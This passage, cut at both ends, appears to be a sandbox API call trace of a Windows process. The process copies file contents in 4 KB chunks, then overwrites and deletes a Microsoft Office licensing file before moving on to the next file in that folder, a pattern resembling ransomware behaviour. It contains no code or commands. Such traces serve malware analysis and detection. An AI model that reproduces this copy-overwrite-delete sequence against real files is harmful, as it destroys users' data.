lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.730] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.730] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.731] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.731] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.731] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.731] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.731] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.731] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.732] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.732] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.769] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.769] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.769] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.769] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.770] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.770] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.770] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.770] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.770] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.770] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.770] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.770] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.771] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.771] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.771] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.771] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.771] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.771] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.771] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.772] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.772] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x2bb, lpOverlapped=0x0) returned 1 [0101.772] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0101.772] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb) returned 0x7d5a0 [0101.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0101.772] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327ef70*=0x2c0, lpOverlapped=0x0) returned 1 [0101.772] CloseHandle (hObject=0x27c) returned 1 [0101.773] CloseHandle (hObject=0x368) returned 1 [0101.836] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.841] GetFileType (hFile=0x368) returned 0x1 [0101.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0101.841] WriteFile (in: hFile=0x368, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0101.842] CloseHandle (hObject=0x368) returned 1 [0101.842] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms")) returned 1 [0101.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0101.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0101.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0101.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0101.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0101.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0101.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0101.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0101.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x570e0 | out: hHeap=0x20000) returned 1 [0101.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0101.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0101.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0101.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0101.844] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.844] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.844] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b5b0d00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0xd9ff8cc1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x5b5b0d00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x1, dwReserved1=0x20304, cFileName="pkeyconfig.companion.dll", cAlternateFileName="PKEYCO~1.DLL")) returned 1 [0101.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0101.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b80 [0101.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0101.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0101.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0101.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0101.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0101.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0101.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0101.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0101.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0101.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0101.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0101.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0101.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0101.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0101.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0101.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0101.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cf80 [0101.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0101.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x4bd68 [0101.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0101.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0101.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89558 [0101.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4bd68 | out: hHeap=0x20000) returned 1 [0101.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89558 | out: hHeap=0x20000) returned 1 [0101.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0101.845] AreFileApisANSI () returned 1 [0101.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll", lpUsedDefaultChar=0x0) returned 105 [0101.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0101.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0101.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0101.845] AreFileApisANSI () returned 1 [0101.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0101.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x4ebc8 [0101.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll") returned 105 [0101.846] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig.companion.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.846] GetFileType (hFile=0x368) returned 0x1 [0101.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0101.847] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0101.847] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0101.847] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0101.847] CloseHandle (hObject=0x368) returned 1 [0101.847] AreFileApisANSI () returned 1 [0101.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0101.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x4ebc8 [0101.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll") returned 105 [0101.847] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig.companion.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.848] GetFileType (hFile=0x368) returned 0x1 [0101.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0101.848] CloseHandle (hObject=0x368) returned 1 [0101.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0101.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0101.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0101.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0101.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0101.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0101.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0101.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0101.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0101.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0101.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0101.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0101.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0101.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0101.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0101.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0101.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0101.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0101.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0101.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0101.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0101.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0101.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0101.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0101.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0101.849] RtlAllocateHeap 